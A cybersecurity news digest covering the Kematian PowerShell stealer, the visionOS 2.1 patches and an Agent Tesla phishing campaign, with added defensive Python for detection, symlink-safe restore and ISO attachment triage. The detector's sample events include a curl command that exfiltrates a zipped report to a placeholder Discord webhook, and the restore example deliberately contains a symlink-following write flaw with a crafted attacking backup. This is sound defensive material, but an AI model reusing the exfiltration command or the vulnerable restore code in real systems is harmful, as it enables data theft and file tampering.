Anatsa Trojan’s new capabilities. Third-party breach hits airlines. Gas station blues. What’s up with the Internet Research Agency? Infrastructure threats. And DDoS grows more sophisticated.
Anatsa Trojan reveals new capabilities. Airlines report employee data stolen in a third-party breach. Canadian energy company Suncor reports a cyberattack. What of the Internet Research Agency? Microsoft warns of a rising threat to infrastructure. Joe Carrigan describes an ill-advised phishing simulation. Mr. Security Answer Person John Pescatore takes on zero days. And DDoS grows more sophisticated.
Kematian Stealer Abuses PowerShell Tool for Covert Data Exfiltration
Kematian Stealer is a PowerShell-based information stealer that quietly collects system and network data from compromised Windows hosts and ships it out over a legitimate web service.
This article walks through its loader, persistence mechanism, the data it gathers and how that data leaves the host, drawing on analysis published by K7 Labs.
Binary Analysis
The Kematian Stealer begins its operation with a 64-bit portable executable loader file, written in C++.
This loader contains an obfuscated script within its resource section, designed to evade detection and analysis.
Upon execution, the loader extracts a blob named “112E9CAC33494A35D3547F4B3DCD2FD5” from its resource section, according to the K7 Labs report.
This blob is then decrypted, revealing a batch file that initiates the next phase of the attack.
Resource Blob
K7 Labs assesses the decryption routine to be RC4. Until this loop has run, the batch stage exists only as ciphertext inside the loader, so static inspection of the executable alone shows nothing but the encrypted blob.
Decryption_Loop
The decrypted batch file launches the PowerShell stage.
That script first checks whether it is running with administrative rights and, if it is not, prompts the user to elevate; only then does it establish persistence through the Windows Task Scheduler.
Persistence and Data Collection
For persistence, the malware copies the PowerShell script to the %APPDATA% folder as percs.ps1 and registers a scheduled task that runs it at regular intervals, so it survives reboots and log-offs.
A scheduled task whose action launches PowerShell on a script under a user’s AppData directory is uncommon in normal administration and is the first artefact worth hunting for.
Task Creation
The collection logic lives in a function named grub. It starts by retrieving the host’s public IP address with a web request to “https://api.ipify.org”.
The address is written to a text file named “ip.txt” in the user’s local application data directory.
Next, the malware runs the built-in systeminfo.exe to gather the OS version, hostname, system model and similar details, saving the output as “system_info.txt”.
Additionally, the malware extracts the system’s UUID and MAC addresses using Windows Management Instrumentation (WMI) and stores these details in “uuid.txt” and “mac.txt,” respectively.
Network and User Information
The Kematian Stealer also runs NETSTAT.EXE to capture active connections, listening ports and the process IDs that own them.
This gives the attacker a map of what the host talks to, which services it exposes and which processes are behind each socket, before any hands-on activity is needed.
Netstat Stealer
The script also reads user and host details from environment variables, such as the account name and computer name, so the attacker can tie the collected data to a specific user profile.
The collected data is formatted into a report and sent to a Discord channel via a webhook.
Data Exfiltration and Evasion
The final stage is exfiltration of everything collected so far.
The malware compresses the text files into a zip archive and uses curl.exe to POST the archive together with a JSON payload to a Discord webhook.
Because the traffic is HTTPS to a widely allowed service, it blends in with ordinary Discord use on most networks; the webhook URL itself is the most reliable network indicator, since legitimate clients do not post to api/webhooks endpoints from curl.
Data Compressing
To evade detection, the malware checks for the presence of security tools like Discord Token Protector and removes them if found.
It also attempts to download additional payloads from the Kematian Stealer GitHub page, although some URLs redirect to outdated versions.
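The chain described above (a scheduled PowerShell run of percs.ps1 from %APPDATA%, systeminfo and netstat spawned from PowerShell, then curl.exe posting to a Discord webhook) maps directly onto process-creation telemetry. The following Python is an added example, not part of the K7 Labs analysis or the malware: it correlates constructed, Sysmon-style process events (the hosts, timestamps, field names and command lines, including the curl argument form and the placeholder webhook ID and token, are made up for the example) and scores each host by how many of the three stages it shows.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Constructed process-creation events, made up for this example, in the shape a
# normalised Sysmon Event ID 1 feed might have. ws01 shows the full Kematian
# chain; ws02 is an administrator running systeminfo from an interactive shell.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYS32 = r"C:\Windows\System32"
EVENTS = [
    {"host": "ws01", "ts": 1000, "parent": SYS32 + r"\svchost.exe", "image": PS,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\alice\AppData\Roaming\percs.ps1"},
    {"host": "ws01", "ts": 1002, "parent": PS, "image": SYS32 + r"\systeminfo.exe", "cmdline": "systeminfo"},
    {"host": "ws01", "ts": 1003, "parent": PS, "image": SYS32 + r"\NETSTAT.EXE", "cmdline": "netstat -ano"},
    {"host": "ws01", "ts": 1005, "parent": PS, "image": SYS32 + r"\curl.exe",
     "cmdline": r'curl.exe -F "file=@C:\Users\alice\AppData\Local\report.zip" -F "payload_json={}" https://discord.com/api/webhooks/000000000/example-token'},
    {"host": "ws02", "ts": 2000, "parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": "powershell.exe"},
    {"host": "ws02", "ts": 2001, "parent": PS, "image": SYS32 + r"\systeminfo.exe", "cmdline": "systeminfo"},
    {"host": "ws02", "ts": 2100, "parent": SYS32 + r"\cmd.exe", "image": SYS32 + r"\curl.exe",
     "cmdline": "curl.exe https://intranet.example/health"},
]

# Indicators taken from the write-up: the dropped script name and location, the
# recon utilities PowerShell spawns, and the Discord webhook used for exfiltration.
PERSIST_RE = re.compile(r"appdata\\roaming\\percs\.ps1", re.I)
WEBHOOK_RE = re.compile(r"https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/\d+/", re.I)
RECON_TOOLS = {"systeminfo.exe", "netstat.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path (case-insensitive matching)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_kematian(events: List[dict], window: int = 300) -> Dict[str, dict]:
    """Per host, look for (1) PowerShell launched on percs.ps1 under %APPDATA%,
    (2) recon utilities spawned by PowerShell and (3) curl.exe posting to a Discord
    webhook, with (2) and (3) required within `window` seconds of the first
    PowerShell child. Score = number of stages seen; only hosts with >= 1 are returned."""
    by_host: Dict[str, List[dict]] = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    results: Dict[str, dict] = {}
    for host, evs in by_host.items():
        evs = sorted(evs, key=lambda e: e["ts"])
        findings = []
        if any(basename(e["image"]) == "powershell.exe" and PERSIST_RE.search(e["cmdline"]) for e in evs):
            findings.append("persistence: PowerShell run on %APPDATA%\\percs.ps1")
        children = [e for e in evs if basename(e["parent"]) == "powershell.exe"]
        if children:
            t0 = children[0]["ts"]
            recent = [e for e in children if e["ts"] - t0 <= window]
            recon = sorted({basename(e["image"]) for e in recent} & RECON_TOOLS)
            if recon:
                findings.append("recon from PowerShell: " + ", ".join(recon))
            if any(basename(e["image"]) == "curl.exe" and WEBHOOK_RE.search(e["cmdline"]) for e in recent):
                findings.append("exfil: curl.exe posting to a Discord webhook")
        if findings:
            results[host] = {"score": len(findings), "findings": findings}
    return results


def alert_hosts(results: Dict[str, dict], threshold: int = 2) -> List[str]:
    """Hosts whose score meets the threshold. A single stage (an admin running
    systeminfo from PowerShell) is too common to page on; two or more are not."""
    return sorted(h for h, r in results.items() if r["score"] >= threshold)


if __name__ == "__main__":
    res = detect_kematian(EVENTS)
    for host, r in res.items():
        print(host, r["score"], r["findings"])
    print("alert:", alert_hosts(res))
```

The threshold is the design point: any one of the three stages appears in benign activity, but persistence via a user-writable script plus recon plus a webhook POST from curl within a few minutes does not. The webhook regex also matches the older discordapp.com host so that a trivial change of domain does not evade it.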
The Kematian Stealer exemplifies the increasing sophistication of modern malware.
With features like a GUI builder, antivirus evasion, and capabilities to extract WiFi passwords, webcams, desktop screenshots, and session data from various clients, it poses a significant threat to individual users and organizations.
Kematian’s reliance on built-in tooling (PowerShell, systeminfo, netstat, curl and the Task Scheduler) and on a legitimate service for exfiltration means that file signatures see little that is novel.
Defenders are better served by watching for the behavioural chain, the scheduled task pointing into AppData, and outbound POSTs to Discord webhook URLs from command-line tools.
Apple visionOS 2.1 Released with Fix for Multiple Security Vulnerabilities
Apple has recently rolled out the visionOS 2.1 update for its Apple Vision Pro mixed reality headset, addressing many critical security vulnerabilities that could have significant implications for user privacy and device integrity.
The update includes fixes for over 25 security issues that could allow malicious actors to execute arbitrary code, access sensitive data, or cause system crashes.
Among the most significant vulnerabilities patched is a kernel memory corruption issue that could enable apps to cause unexpected system termination or corrupt kernel memory.
The update also addresses several WebKit-related vulnerabilities, including one that could lead to unexpected process crashes when processing maliciously crafted web content.
Vulnerabilities Patched
The visionOS 2.1 update targets several high-severity vulnerabilities identified across various operating system components.
One key issue addressed is a path handling problem that could allow malicious apps to run arbitrary shortcuts without user consent, potentially leading to unauthorized access to sensitive data. This has been resolved through improved logic checks (CVE-2024-44255).
Another critical vulnerability involved the CoreMedia Playback component, where a malicious app could access private information due to improper handling of symlinks. This issue has been mitigated with enhanced symlink handling (CVE-2024-44273).
Several kernel-level vulnerabilities have been patched, including an information disclosure issue that could allow apps to leak sensitive kernel states. This has been addressed through improved private data redaction for log entries (CVE-2024-44239).
Additionally, a use-after-free issue in the IOSurface component, which could cause unexpected system termination or corrupt kernel memory, has been fixed with improved memory management (CVE-2024-44285).
WebKit, the web engine powering Safari on the Apple Vision Pro, has also received significant updates. Issues such as memory corruption and the failure to enforce Content Security Policy (CSP) when processing maliciously crafted web content have been addressed through improved input validation and checks (CVE-2024-44244, CVE-2024-44296).
To enhance user privacy, Apple has fixed several vulnerabilities related to data leakage. For instance, a bug that allowed sensitive information to be viewed from the Lock Screen has been rectified with improved redaction of sensitive data (CVE-2024-44262).
Similarly, issues in Siri and system logs that could expose sensitive user data have been resolved with enhanced redaction and validation measures (CVE-2024-44194, CVE-2024-44278).
Other Notable Fixes
Other notable fixes include:
ImageIO: Multiple issues related to processing images, including out-of-bounds reads and denial-of-service vulnerabilities, have been addressed with improved input validation and bounds checks (CVE-2024-44215, CVE-2024-44297).
Managed Configuration: A vulnerability that allowed malicious backup files to modify protected system files has been fixed with improved handling of symlinks (CVE-2024-44258).
Safari Downloads: An issue that could allow attackers to misuse trust relationships to download malicious content has been resolved through improved state management (CVE-2024-44259).
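Two of the fixes above (CoreMedia Playback and Managed Configuration) are described by Apple only as “improved handling of symlinks”, which is the usual phrasing for a restore or copy routine that follows a link it should have refused. The following Python is an added illustration of that bug class and is not Apple’s code or format: it defines a made-up, minimal backup format (an ordered list of symlink and file entries), a naive restore that writes through a planted link into a file outside the restore directory, and a hardened restore that confines every path and link target to the restore root and opens files with O_NOFOLLOW. All file names and directory layout are constructed for the example.

```python
import os
import tempfile
from pathlib import Path
from typing import List, Tuple

# Constructed, minimal backup format for the example: an ordered list of entries,
# each ("symlink", relative_path, link_target) or ("file", relative_path, text).
Entry = Tuple[str, str, str]


def malicious_backup(protected_file: Path) -> List[Entry]:
    """Backup crafted so a naive restore writes through a symlink into a file outside
    the restore directory: first plant the link, then 'restore' a file at the same
    path, which a symlink-following write redirects to the protected target."""
    return [
        ("symlink", "prefs.plist", str(protected_file)),
        ("file", "prefs.plist", "attacker-controlled content"),
    ]


def restore_naive(entries: List[Entry], dest: Path) -> None:
    """Vulnerable restore: trusts entry paths and writes with a link-following open."""
    for kind, rel, payload in entries:
        path = dest / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        if kind == "symlink":
            if path.is_symlink() or path.exists():
                path.unlink()
            os.symlink(payload, path)
        else:
            path.write_text(payload)  # follows the symlink planted by the previous entry


def _inside(root: Path, candidate: Path) -> bool:
    return candidate == root or root in candidate.parents


def restore_safe(entries: List[Entry], dest: Path) -> None:
    """Hardened restore: reject absolute or '..' paths, require each parent and each
    link target to resolve inside the restore root, and never write through a link
    (O_NOFOLLOW fails with ELOOP if the path is already a symlink)."""
    root = dest.resolve()
    for kind, rel, payload in entries:
        rel_path = Path(rel)
        if rel_path.is_absolute() or ".." in rel_path.parts:
            raise ValueError(f"rejected path {rel!r}")
        path = dest / rel_path
        if not _inside(root, path.parent.resolve()):  # parent could be a symlinked directory
            raise ValueError(f"parent of {rel!r} resolves outside the restore root")
        path.parent.mkdir(parents=True, exist_ok=True)
        if kind == "symlink":
            target = Path(payload) if os.path.isabs(payload) else path.parent / payload
            if not _inside(root, target.resolve()):
                raise ValueError(f"symlink {rel!r} -> {payload!r} escapes the restore root")
            os.symlink(payload, path)
        else:
            flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW
            try:
                fd = os.open(path, flags, 0o600)
            except OSError as exc:
                raise ValueError(f"refusing to write through {rel!r}: {exc.strerror}") from exc
            with os.fdopen(fd, "w") as fh:
                fh.write(payload)


def demo() -> dict:
    """Run the crafted backup through both restores, plus the hardened restore against a
    destination where an escaping link already exists, and report whether the protected
    file outside the restore directory was modified in each case."""
    out = {}
    with tempfile.TemporaryDirectory() as tmp:
        protected = Path(tmp) / "system" / "protected.conf"
        protected.parent.mkdir()
        for name, restore in (("naive", restore_naive), ("safe", restore_safe)):
            protected.write_text("original")
            dest = Path(tmp) / f"restore_{name}"
            dest.mkdir()
            error = None
            try:
                restore(malicious_backup(protected), dest)
            except ValueError as exc:
                error = str(exc)
            out[name] = {"tampered": protected.read_text() != "original", "error": error}
        # Pre-planted link scenario: the link is already in the destination, so only
        # the O_NOFOLLOW check stands between the file entry and the protected target.
        protected.write_text("original")
        dest = Path(tmp) / "restore_prelinked"
        dest.mkdir()
        os.symlink(str(protected), dest / "prefs.plist")
        error = None
        try:
            restore_safe([("file", "prefs.plist", "attacker-controlled content")], dest)
        except ValueError as exc:
            error = str(exc)
        out["prelinked"] = {"tampered": protected.read_text() != "original", "error": error}
    return out


if __name__ == "__main__":
    for scenario, result in demo().items():
        print(scenario, result)
```

The two checks are independent on purpose: path confinement catches a link that the backup itself supplies, while O_NOFOLLOW catches one that was already on disk, whether from an earlier restore or planted by another app. Checking only the textual path, without resolving it, would pass both attacks.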
Users of the Apple Vision Pro are strongly advised to update their devices to visionOS 2.1 as soon as possible to mitigate these security risks. The update is available through the standard software update process.
Most of these are familiar bug classes (kernel memory corruption, symlink handling, insufficient log redaction, WebKit input validation) appearing on a new platform, so the usual advice applies: install updates promptly and treat the headset as a full computing device rather than a peripheral.
Apple has acknowledged the contributions of several security researchers and teams, including those from Trend Micro Zero Day Initiative, CrowdStrike Counter Adversary Operations, and various individual researchers, for their role in identifying and reporting these vulnerabilities. This collaborative effort is crucial in maintaining the security posture of Apple’s ecosystem.
Researchers Unveil The Attackers Behind The Agent Tesla Campaign
Check Point Research has exposed a recent wave of cyberattacks utilizing the infamous Agent Tesla malware. This campaign targeted organizations in the United States and Australia.
First appearing in 2014, Agent Tesla masquerades as legitimate software but acts as a silent thief in the background.
It operates as a keylogger and credential stealer, recording keystrokes on the infected device and harvesting usernames, passwords and financial data for the attacker.
The attack, initiated in November 2023, relied heavily on phishing emails. These deceptive emails, often crafted with social engineering tactics, are designed to trick recipients into clicking malicious links or attachments.
In this case, the emails likely appeared to be legitimate purchase orders or delivery notifications, increasing the chance of someone clicking.
Check Point Research identified two key players in this operation: Bignosa, the main threat actor, and Gods, a possible collaborator.
Bignosa appears to be part of a larger group targeting organizations globally. Evidence suggests they possess vast email databases focusing on businesses, educational institutions, and even individuals in both the US and Australia.
Additionally, they maintain a network of servers used for remote access and launching phishing campaigns.
Attack Breakdown
Activity of the “Bignosa” threat actor shown on the timeline
Bignosa set up servers, installed email software like RoundCube, and uploaded malicious payloads protected with a custom tool called “Cassandra Protector.”
This tool disguises the initial code and converts the malware into seemingly harmless ISO files. Bignosa utilized stolen email credentials to send out phishing emails with disguised Agent Tesla attachments.
The emails mimicked legitimate business communications, likely leveraging content from online resources.
Once a recipient opened the attachment, Agent Tesla executed and began silently harvesting data from the device.
This information was then relayed back to the attacker’s servers. Following the initial attack on Australian organizations on November 7th, a second wave targeted both the US and Australia on November 30th.
The tactics remained consistent, highlighting the effectiveness of phishing emails for Bignosa.
Both campaigns employed Cassandra Protector, a commercially available tool that allows attackers to obfuscate malware and bypass security measures.
Bignosa leveraged Cassandra Protector’s functionalities like anti-virus evasion and creating ISO files to mask the true nature of the malware.
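The ISO packaging matters for defenders because a disk image is judged by its extension in many mail filters, and renaming it to look like a document is trivial. The following Python is an added example, not Check Point’s tooling or anything from the campaign: it identifies ISO 9660 images by content (the “CD001” primary volume descriptor at sector 16) rather than by name, and applies a simple quarantine policy. The sample attachments, their names and the quarantine policy are constructed for the example; the ISO layout constants are from the ISO 9660 format itself.

```python
import os
from typing import Dict, Optional

SECTOR = 2048
PVD_OFFSET = 16 * SECTOR   # ISO 9660: volume descriptors begin at logical sector 16
ISO_MAGIC = b"CD001"       # standard identifier present in every volume descriptor
PVD_TYPE = 1               # descriptor type code of the primary volume descriptor


def build_minimal_iso(volume_id: str) -> bytes:
    """Construct a minimal ISO 9660 image for the example: 16 empty system-area
    sectors followed by a primary volume descriptor. Enough for signature checks;
    it is not a mountable image and carries no files."""
    pvd = bytearray(SECTOR)
    pvd[0] = PVD_TYPE
    pvd[1:6] = ISO_MAGIC
    pvd[6] = 1                                              # descriptor version
    pvd[40:72] = volume_id.encode("ascii")[:32].ljust(32)   # volume identifier, bytes 40-71
    return bytes(PVD_OFFSET) + bytes(pvd)


def iso_volume_id(data: bytes) -> Optional[str]:
    """Return the volume identifier if `data` carries a primary volume descriptor at
    sector 16, else None. Keyed on content, so renaming the file does not help."""
    if len(data) < PVD_OFFSET + SECTOR:
        return None
    pvd = data[PVD_OFFSET:PVD_OFFSET + SECTOR]
    if pvd[0] != PVD_TYPE or pvd[1:6] != ISO_MAGIC:
        return None
    return pvd[40:72].decode("ascii", errors="replace").strip()


DISK_IMAGE_EXTS = {".iso", ".img", ".vhd", ".vhdx"}


def triage_attachment(filename: str, data: bytes) -> Dict[str, object]:
    """Gateway-style verdict for one attachment (policy is an assumption for the
    example): disk images from external mail are quarantined outright, and a disk
    image hiding behind a document extension is recorded as an extra reason."""
    ext = os.path.splitext(filename)[1].lower()
    shown_ext = ext or "(none)"
    volume_id = iso_volume_id(data)
    reasons = []
    if volume_id is not None:
        reasons.append(f"ISO 9660 image (volume id {volume_id!r})")
        if ext not in DISK_IMAGE_EXTS:
            reasons.append(f"extension {shown_ext!r} does not match content")
    elif ext in DISK_IMAGE_EXTS:
        reasons.append(f"disk-image extension {shown_ext!r}")
    return {
        "filename": filename,
        "is_iso": volume_id is not None,
        "volume_id": volume_id,
        "verdict": "quarantine" if reasons else "allow",
        "reasons": reasons,
    }


# Constructed sample attachments (not real campaign artefacts): an ISO with its own
# extension, an ISO renamed to look like a PDF, and a file with a genuine PDF header.
SAMPLES = {
    "Purchase_Order_4471.iso": build_minimal_iso("PURCHASE_ORDER"),
    "Delivery_Notification.pdf": build_minimal_iso("DELIVERY"),
    "Invoice_Q4.pdf": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n1 0 obj\n<< /Type /Catalog >>\nendobj\n",
}


def triage_all(samples=SAMPLES) -> Dict[str, Dict[str, object]]:
    return {name: triage_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, result in triage_all().items():
        print(f"{result['verdict']:10} {name}: {'; '.join(result['reasons']) or 'no findings'}")
```

A content check like this belongs alongside, not instead of, archive and attachment scanning: the point is that the decision to quarantine is made from the bytes at sector 16, so an attacker who renames the image or nests it under a benign-looking filename gains nothing.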
Bignosa, a cybercriminal likely from Kenya, appears to be a seasoned attacker. He uses the alias Nosakhare and has been conducting phishing campaigns for a while.
Evidence suggests he uses Agent Tesla and other malware (Quasar, Warzone, PureCrypter) and relies on tools like Grammarly and SuperMailer for his malicious activities.
Bignosa collaborates with Gods, another attacker who may operate under multiple aliases (Gods & Kmarshal).
Gods transitioned from phishing to malware campaigns around June 2023 and appears to be more technically skilled, even helping Bignosa clean Agent Tesla infections.
While the investigation couldn’t fully identify Gods, it revealed interesting clues. He potentially studied at a Turkish university, doesn’t speak Turkish fluently, and uses ChatGPT to translate spam messages.
Additionally, a YouTube channel (“8 Letter Tech”) linked to Gods’ email address provides tutorials on setting up email servers, potentially used for his malicious campaigns.
Bignosa & Gods Jabber conversations
The investigation uncovers their collaboration through shared resources and communication.
For example, a VDS server paid for by Bignosa was later administered by Gods. Social media analysis further strengthens the connection between Bignosa and Gods.
The investigation identified connections between accounts associated with both individuals, including a web design business potentially run by Gods (using the alias Kingsley Fredrick).
The investigation also revealed Gods’ continued malicious activity. He launched phishing campaigns in December 2023 and January 2024, highlighting the ongoing threat posed by this group.